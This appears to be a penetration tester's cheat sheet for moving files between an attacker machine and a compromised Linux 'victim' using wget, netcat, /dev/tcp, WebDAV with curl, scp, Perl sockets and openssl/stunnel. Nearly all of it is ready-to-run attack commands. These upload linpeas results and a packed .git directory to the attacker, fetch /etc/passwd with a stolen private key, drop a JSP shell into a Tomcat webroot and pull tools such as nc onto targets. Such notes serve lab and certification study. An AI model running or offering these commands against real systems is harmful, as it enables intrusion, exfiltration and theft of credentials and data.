🐧Linux File Transfers

wget

#wget

Attacker

python -m http.server

Victim

wget 192.168.45.161/socat

nc

#nc

Attacker

nc -lnvp 9001 > file

Victim

nc -qvn 192.168.45.244 9001 < file

OR

cat file > /dev/tcp/192.168.45.244/9001

Python webdav

#python #webdav

Attacker

/home/cyber02/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

Victim

python3 -c "import requests; requests.put('http://192.168.45.184/linpeas.out', data=open('linpeas.out', 'rb'))"

Or

curl -T linpeas.out http://192.168.45.184/

Or

curl --upload-file linpeas.out http://192.168.45.184/

Or

wget --method=PUT --body-file=linpeas.out http://192.168.45.184/linpeas.out

to download a complete directory, compress it:

tar -czf git.tar.gz .git
curl -T git.tar.gz http://192.168.45.184/

unzip the file

tar -xzvf git.tar.gz

SCP

#scp

Regular SCP

scp file.txt cyber02@192.168.45.212:/home/cyber02/Desktop/

SCP using private key

Transfer shell to remote server

scp -i id_rsa shell.jsp james@192.168.244.100:/var/lib/tomcat7/webapps/ROOT/

Get the passwd file (-O used to bypass the error scp: Received message too long )

scp -O -i id_rsa james@192.168.244.100:/etc/passwd ./passwd

Perl

some machines are really limited and have only Perl installed, we can use Perl simple HTTP transfer

perl -e 'use LWP::Simple; getstore("http://domain/file", "file");'

if LWP::Simple is not installed in a minimal PostgreSQL container.

we Use raw TCP/HTTP with Perl (no modules required)

perl -e '
use Socket;
$i="192.168.45.190";
$p=8080;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket: $!";
connect(S, sockaddr_in($p, inet_aton($i))) or die "connect: $!";
open(O, ">linpeas.sh") or die "Cannot open output file: $!";
while(<S>){print O $_;}
close O; close S;
'

on our kali host (we can’t use python http module, since this is a raw TCP connection):

nc -lnvp 8080 < linpeas.sh

Openssl (raw tcp transfer)

this is similar to perl raw tcp transfer but secure since it is encrypted

On host

Generate a self-signed cert for SSL


openssl req -x509 -newkey rsa:2048 -keyout server.pem -out server.pem \
    -days 1 -nodes -subj '/CN=test' 2>/dev/null

Serve the file over TLS

openssl s_server -port 8080 -cert server.pem -key server.pem -quiet < linpeas.sh

On victim (target machine)

openssl s_client -connect 192.168.45.190:8080 -quiet 2>/dev/null > linpeas.sh

Openssl (HTTP transfer using stunnel)

On Host machine

# Generate certificate

openssl req -x509 -newkey rsa:2048 -keyout stunnel.pem -out stunnel.pem -days 1 -nodes -subj '/CN=test' 2>/dev/null

# Create stunnel config

cat > stunnel.conf << EOF 
[https] accept = 8080
connect = 127.0.0.1:8081
cert = stunnel.pem
key = stunnel.pem
EOF

# Start stunnel and HTTP server

stunnel stunnel.conf & python3 -m http.server 8081

On target

(echo -e "GET /nc HTTP/1.0\r\nHost: 192.168.45.190\r\n\r\n") | openssl s_client -connect 192.168.45.190:8080 -ign_eof -quiet 2>/dev/null | sed '1,/^\r$/d' > /tmp/nc